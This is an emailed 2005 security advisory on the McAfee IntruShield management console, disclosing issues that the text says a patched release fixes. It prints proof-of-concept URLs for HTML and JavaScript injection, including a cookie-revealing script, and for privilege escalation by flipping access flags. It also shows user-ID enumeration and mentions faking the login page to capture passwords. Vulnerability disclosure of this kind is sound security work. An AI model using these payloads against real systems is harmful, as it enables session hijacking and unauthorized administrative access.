------=_Part_13419_25560245.1120660746428
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

 /*
***************************************************************************=
**************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console=
=20
Abuse
***************************************************************************=
**************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
***************************************************************************=
**************************************
$ This advisory and/or proof of concept code must not be used for commercia=
l=20
gain.
***************************************************************************=
**************************************

McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm


"The McAfee IntruShield Security Management System is an advanced solution=
=20
for administering IntruShield
sensor appliance deployments. The IntruShield Security Management System=20
(ISM) can support both large and
small network intrusion prevention system (IPS) deployments and can scale u=
p=20
to several hundred sensor
appliances. By integrating a comprehensive set of Best-in-Class security=20
management functions, the
IntruShield Security Management System dramatically simplifies and=20
streamlines the complexities associated
with IPS configuration, policy compliance, and threat and response=20
management."

I have found some security vulnerabilities in this product whereby a user=
=20
can elevate their privileges from
a user that can only view alerts logged by remote sensors, to a scenario=20
where the user can gain access to
acknowledge, accept and delete alerts and access the Management Console. It=
=20
is also possible to inject
malicious HTML and JavaScript into the URLS and have this malicious script=
=20
run on the clients machine,
allowing for account information hijacking.

A new version has been released to address these bugs and can be downloaded=
=20
from their site.

*/

Issues:=20
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console

Note: for issues 1 - 4, the attacker needs a valid user account.

1) It is possible to embed HTML into the MISMS. This could potentially allo=
w=20
phishing attacks to be performed
against a valid Manager account.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dfalse&faultResourceName=3DManager&
domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&resourceType=
=3DManager&
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=
hirdMenuName=3D<iframe%20src=3D"
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504=
.htm"%20width=3D800%20height=3D600
>
</iframe>&severity=3Dcritical&count=3D1


2) It is possible to embed JavaScript into the MISMS and have the embedded=
=20
script execute in the security
context of the user browsing the Management System.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dfalse&faultResourceName=3DManager&
domainName=3DDemo&resourceName=3D<script>alert("There could be trouble=20
ahead")</script><script>alert(document.cookie)
</script>&resourceType=3DManager&topMenuName=3DSystemHealthManager&secondMe=
nuName=3DFaults&resourceId=3D-1&thirdMenuName=3D
Critical&severity=3Dcritical&count=3D1


3) It is possible to access the restricted "Generate Reports" section of th=
e=20
MISMS and as such, a non-privileged
user can gain important information regarding the configuration and set-up=
=20
of the IP devices being managed by the
Service. This can be achieved by simply changing the Access option from=20
false to true.

https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?mon=
itoredDomain=3D%2FDemo&
selectedDomain=3D0&fullAccessRight=3Dtrue


4) It is possible to acknowledge, de-acknowledge and delete alerts from the=
=20
MISMS console by modifying URL's
sent to the system by simply changing the Access option from false to true.

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dtrue&faultResourceName=3DManager&
domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&resourceType=3D=
Manager&
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=
hirdMenuName=3DCritical&severity=3D
critical&count=3D1

Each change is emailed out to the administrator, however the email only say=
s=20
that "someone" made a change.

5) As default, all user ID values are passed in the URL in the clear,=20
meaning that it is trivial for an attacker
to brute force accounts until a privileged Manager account is found. An=20
example of this would look similar to:

https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D1&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D2&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D3&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D4&logo=3Dintru=
vert.gif

This process can be continued until a valid user ID has been found with=20
privileges to access the configure screen.

Since javascript can be run in the browsers of clients accessing the device=
,=20
it would be possible to redraw the page
with IFRAME's and recreate the user login page to snoop usersnames and=20
passwords.

------=_Part_13419_25560245.1120660746428
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

&nbsp;/*<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; $ An open security advisory #8 - McAfee Intrushield IPS Management C=
onsole Abuse<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com<br>
&nbsp; 2: Bug Released: July 06 2005<br>
&nbsp; 3: Bug Impact Rate: Medium / Hi<br>
&nbsp; 4: Bug Scope Rate: Local / Remote<br>
&nbsp; ********************************************************************=
*********************************************<br>
&nbsp; $ This advisory and/or proof of concept code must not be used for co=
mmercial gain.<br>
&nbsp; ********************************************************************=
*********************************************<br>
<br>
&nbsp; McAfee IntruShield Security Management System<br>
&nbsp; <a href=3D"http://www.mcafeesecurity.com/us/products/mcafee/network_=
ips/category.htm">http://www.mcafeesecurity.com/us/products/mcafee/network_=
ips/category.htm</a><br>
<br>
<br>
&nbsp; &quot;The McAfee IntruShield Security Management System is an advanc=
ed solution for administering IntruShield<br>
&nbsp; sensor appliance deployments. The IntruShield Security Management Sy=
stem (ISM) can support both large and<br>
&nbsp; small network intrusion prevention system (IPS) deployments and can =
scale up to several hundred sensor<br>
&nbsp; appliances. By integrating a comprehensive set of Best-in-Class secu=
rity management functions, the<br>
&nbsp; IntruShield Security Management System dramatically simplifies and s=
treamlines the complexities associated<br>
&nbsp; with IPS configuration, policy compliance, and threat and response m=
anagement.&quot;<br>
<br>
&nbsp; I have found some security vulnerabilities in this product whereby a=
 user can elevate their privileges from<br>
&nbsp; a user that can only view alerts logged by remote sensors, to a scen=
ario where the user can gain access to<br>
&nbsp; acknowledge, accept and delete alerts and access the Management Cons=
ole. It is also possible to inject<br>
&nbsp; malicious HTML and JavaScript into the URLS and have this malicious =
script run on the clients machine,<br>
&nbsp; allowing for account information hijacking.<br>
<br>
&nbsp; A new version has been released to address these bugs and can be dow=
nloaded from their site.<br>
<br>
*/<br>
<br>
&nbsp; Issues: <br>
&nbsp; 1) Inject HTML<br>
&nbsp; 2) Inject JavaScript<br>
&nbsp; 3) Access privileged reports<br>
&nbsp; 4) Acknowledge and delete alerts<br>
&nbsp; 5) Gain access to Management Console<br>
<br>
&nbsp; Note: for issues 1 - 4, the attacker needs a valid user account.<br>
<br>
&nbsp; 1) It is possible to embed HTML into the MISMS. This could potential=
ly allow phishing attacks to be performed<br>
&nbsp; against a valid Manager account.<br>
<br>
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dfalse&amp;faultResourceName=3DManager&amp;">https://intr=
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&amp;f=
aultResourceName=3DManager&amp;
</a><br>
&nbsp; domainName=3D%2FDemo%3A0&amp;resourceName=3D%2FDemo%3A0%2FManager&am=
p;resourceType=3DManager&amp;<br>
&nbsp; topMenuName=3DSystemHealthManager&amp;secondMenuName=3DFaults&amp;re=
sourceId=3D-1&amp;thirdMenuName=3D&lt;iframe%20src=3D&quot;<br>
&nbsp; <a href=3D"http://www.mcafeesecurity.com/us/about/press/corporate/20=
05/20050411_185504.htm&quot;%20width=3D800%20height=3D600">http://www.mcafe=
esecurity.com/us/about/press/corporate/2005/20050411_185504.htm&quot;%20wid=
th=3D800%20height=3D600
</a>&gt;<br>
&nbsp; &lt;/iframe&gt;&amp;severity=3Dcritical&amp;count=3D1<br>
<br>
<br>
&nbsp; 2) It is possible to embed JavaScript into the MISMS and have the em=
bedded script execute in the security<br>
&nbsp; context of the user browsing the Management System.<br>
<br>
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dfalse&amp;faultResourceName=3DManager&amp;">https://intr=
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&amp;f=
aultResourceName=3DManager&amp;
</a><br>
&nbsp; domainName=3DDemo&amp;resourceName=3D&lt;script&gt;alert(&quot;There
could be trouble&nbsp;
ahead&quot;)&lt;/script&gt;&lt;script&gt;alert(document.cookie)<br>
&nbsp;
&lt;/script&gt;&amp;resourceType=3DManager&amp;topMenuName=3DSystemHealthMa=
nager&amp;secondMenuName=3DFaults&amp;resourceId=3D-1&amp;thirdMenuName=3D<=
br>
&nbsp; Critical&amp;severity=3Dcritical&amp;count=3D1<br>
<br>
<br>
&nbsp; 3) It is possible to access the restricted "Generate Reports" sectio=
n of the MISMS and as such, a non-privileged<br>
&nbsp; user can gain important information regarding the configuration and =
set-up of the IP devices being managed by the<br>
&nbsp; Service. This can be achieved by simply changing the Access option f=
rom false to true.<br>
<br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/reports/reports-col=
umn-center.jsp?monitoredDomain=3D%2FDemo&amp;">https://intrushield:443/intr=
uvert/jsp/reports/reports-column-center.jsp?monitoredDomain=3D%2FDemo&amp;<=
/a><br>

&nbsp; selectedDomain=3D0&amp;fullAccessRight=3Dtrue<br>
<br>
<br>
&nbsp; 4) It is possible to acknowledge, de-acknowledge and delete alerts f=
rom the MISMS console by modifying URL's<br>
&nbsp; sent to the system by simply changing the Access option from false t=
o true.<br>
<br>
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dtrue&amp;faultResourceName=3DManager&amp;">https://intru=
shield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dtrue&amp;fau=
ltResourceName=3DManager&amp;
</a><br>
&nbsp; domainName=3D%2FDemo%3A0&amp;resourceName=3D%Demo%3A0%2FManager&amp;=
resourceType=3DManager&amp;<br>
&nbsp; topMenuName=3DSystemHealthManager&amp;secondMenuName=3DFaults&amp;re=
sourceId=3D-1&amp;thirdMenuName=3DCritical&amp;severity=3D<br>
&nbsp; critical&amp;count=3D1<br>
<br>
&nbsp; Each change is emailed out to the administrator, however the email o=
nly says that &quot;someone&quot; made a change.<br>
<br>
&nbsp; 5) As default, all user ID values are passed in the URL in the clear=
, meaning that it is trivial for an attacker<br>
&nbsp; to brute force accounts until a privileged Manager account is found.=
 An example of this would look similar to:<br>
<br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D1&amp;logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D1&amp;logo=3Dintruvert.gif</a><br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D2&amp;logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D2&amp;logo=3Dintruvert.gif</a><br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D3&amp;logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D3&amp;logo=3Dintruvert.gif</a><br>
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D4&amp;logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D4&amp;logo=3Dintruvert.gif</a><br>
<br>
&nbsp; This process can be continued until a valid user ID has been found w=
ith privileges to access the configure screen.<br>
<br>
&nbsp; Since javascript can be run in the browsers of clients accessing the=
 device, it would be possible to redraw the page<br>
&nbsp; with IFRAME's and recreate the user login page to snoop usersnames a=
nd passwords.<br>
&nbsp; <br>
<br>

------=_Part_13419_25560245.1120660746428--